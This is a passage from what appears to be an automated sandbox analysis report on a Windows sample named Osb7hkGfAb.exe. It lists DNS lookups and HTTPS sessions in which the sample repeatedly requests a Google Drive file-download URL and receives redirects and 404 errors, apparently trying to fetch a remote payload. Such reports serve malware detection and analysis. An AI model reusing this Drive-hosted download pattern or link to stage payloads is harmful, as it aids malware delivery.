                                                                Jan 10, 2025 15:55:53.318814993 CET49758443192.168.2.9216.58.206.33
                                                                Jan 10, 2025 15:55:53.318840027 CET44349758216.58.206.33192.168.2.9

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 10, 2025 15:54:57.900892019 CET5393553192.168.2.91.1.1.1
                                                                Jan 10, 2025 15:54:57.907571077 CET53539351.1.1.1192.168.2.9
                                                                Jan 10, 2025 15:54:59.042856932 CET6049853192.168.2.91.1.1.1
                                                                Jan 10, 2025 15:54:59.049588919 CET53604981.1.1.1192.168.2.9

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                Jan 10, 2025 15:54:57.900892019 CET192.168.2.91.1.1.10xa900Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                Jan 10, 2025 15:54:59.042856932 CET192.168.2.91.1.1.10x84d3Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                Jan 10, 2025 15:54:57.907571077 CET1.1.1.1192.168.2.90xa900No error (0)drive.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                Jan 10, 2025 15:54:59.049588919 CET1.1.1.1192.168.2.90x84d3No error (0)drive.usercontent.google.com216.58.206.33A (IP address)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • drive.google.com
                                                                • drive.usercontent.google.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.949711142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:54:58 UTC216OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2025-01-10 14:54:59 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:54:58 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-ur8X_0iu3fj_81hcLBqz4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.949712216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:54:59 UTC258OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2025-01-10 14:55:00 UTC2222INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgTOxKKgv0yqzSLoegjtDuFz8wG_4tUO9ZVxnyZ1AfQolu7Ta0Y7LzJkmzzFWj-wtHB6
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:54:59 GMT
                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Security-Policy: script-src 'nonce-t114D-0_h5tx6l17ENxXPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Set-Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI; expires=Sat, 12-Jul-2025 14:54:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 56 54 42 36 4d 61 2d 46 4c 6c 4b 44 75 52 73 67 63 41 6f 32 6b 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="VTB6Ma-FLlKDuRsgcAo2kw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.949713142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:00 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:01 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:01 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-cGI-74GnbVSJ_nmY_gYAlQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.949714216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:01 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:02 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQq3kgsiWJfFbHzE-ofbyjbul2Dr1f4-OgcB0uXXSlFyMkApjy5nVwj0PFeW0imsTKDtL6_GG8
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:02 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy: script-src 'nonce--fKHTpzmTtkfK_LMx4XT6Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 73 49 72 77 6f 55 33 4c 36 76 65 51 4c 31 73 4c 4a 30 38 58 57 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sIrwoU3L6veQL1sLJ08XWQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.949715142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:03 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:03 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:03 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-ZpvlR13m5DhfSc8B1tSE8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.949716216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:04 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:04 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFIdbgQw9k5PSPHYoGsrDsuuse-WYQLdR1cbQHAaMkg6KwNM7OmtwCxzbc5qBUAOQ5qdvtgh1Tf9X48
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:04 GMT
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-OwO8ORBeJ2epaT6YjiGrjQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Content-Length: 1652
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Content-Security-Policy: sandbox allow-scripts
                                                                Connection: close
                                                                2025-01-10 14:55:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6a 37 73 50 32 2d 39 71 53 76 36 32 67 4c 46 6e 55 62 31 74 6b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="j7sP2-9qSv62gLFnUb1tkA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.949717142.250.184.2064435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:05 UTC421OUTGET /uc?export=download&id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:06 UTC1920INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:06 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-w4pEgzhTJS-mYum7lCq2rg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.949718216.58.206.334435680C:\Users\user\Desktop\Osb7hkGfAb.exe
                                                                TimestampBytes transferredDirectionData
                                                                2025-01-10 14:55:06 UTC463OUTGET /download?id=1WMDnWFYlE60XdwrcZgCL3LQ3cnIDyIL4&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                Cookie: NID=520=shz_Xw6iFtyaSHOvpCpFxuuDuWM7wSeeBwQKm-EUr58CfxJG9Q_C4wu989rU0DmNEeJBBnwFlMhR0ZNDpQoNkbhKVRvyxeCr55LQG_2C4Xb9N8tGhESJyFCpD3YuctOW2H4QcDPEl-CcbwsRhePBYqRiEjTMu8tlzM6BjqAAygNGBXK2wZJJrp0v5eI
                                                                2025-01-10 14:55:07 UTC1851INHTTP/1.1 404 Not Found
                                                                X-GUploader-UploadID: AFiumC4tzc24yzZPWi4Zdo8IjJ5RaZU4FGehLnWjnm-O-y_RJBpWVbVM3Iwa7NteBPeFaXu7ieKkJbI
                                                                Content-Type: text/html; charset=utf-8
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Fri, 10 Jan 2025 14:55:07 GMT
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
